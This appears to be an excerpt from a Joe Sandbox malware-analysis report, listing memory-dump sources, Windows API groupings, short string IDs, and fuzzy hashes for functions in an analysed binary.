                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                          • String ID:
                                                                          • API String ID: 3222323430-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                          • String ID:
                                                                          • API String ID: 1015379403-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                          • String ID:
                                                                          • API String ID: 3215588206-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValue$ConnectCreateRegistry
                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                          • API String ID: 3314541760-966354055
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: P
                                                                          • API String ID: 0-3110715001
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                          • String ID: -$:$:$?
                                                                          • API String ID: 3440502458-92861585
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                          • String ID: *.*
                                                                          • API String ID: 1111067124-438819550
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 1409584000-438819550
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                          • String ID: *.*
                                                                          • API String ID: 2640511053-438819550
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 3827137101-3457252023
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3218304859-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 1255039815-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
• String ID: ?
• API String ID: 500310315-1684325040
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
Memory Dump Source
• Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
                                                                          • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                          • Instruction ID: f6331f7ed2fda7d449a12a28ea8dae283cd62fbf92ea97cc0daa87607efe3770
                                                                          • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                          • Instruction Fuzzy Hash: 8141A821A2DA4299EB50FB10E4402ADE360FF94B94FD65031EA5E436E9EF7CD507CB10
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                          • String ID:
                                                                          • API String ID: 383626216-0
                                                                          • Opcode ID: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                          • Instruction ID: b37daee17f7892cf742d3772cb25bd3f8772151dbe9d2d15d8de86024bfe6df1
                                                                          • Opcode Fuzzy Hash: d42387b76471bac3b8932b653f89b44f129081ac0d9aa200aab0c7b58dfd8027
                                                                          • Instruction Fuzzy Hash: A931A373B096528FE754DF61D4807AC77A2FB88748F910235EE0A53A94EF38E946CB50
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                          • Instruction ID: 8f127fcaa36a525eb6be69b269c0dd0bcc789427a35222fa88f92cf20e423afa
                                                                          • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                          • Instruction Fuzzy Hash: 8031823661DB818ED760EF24E8442AEB3A4FB88754FD10136EA9D43B65EF3CC5468B10
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                          • String ID: *.*
                                                                          • API String ID: 1927845040-438819550
                                                                          • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                          • Instruction ID: 2364e2788b3dfaf0da95490c0ecc51732a10b23a404b89d10911d17a7d7eb7db
                                                                          • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                          • Instruction Fuzzy Hash: D9518322A0EB8299EB10EB15E4506ADA370FB45B94FD60132DE5D437A9EF3CD647C710
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                          • API String ID: 0-2187161917
                                                                          • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                          • Instruction ID: 7c9c40da35b1a62ee25d7484e36693f78a8e315fbcc530a8b4aa8879595aa9db
                                                                          • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                          • Instruction Fuzzy Hash: 63B2F972E0E6918EEB209F6495082BDB7A1FB44758FD24135DE4D57BA4EF3CE8428720
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
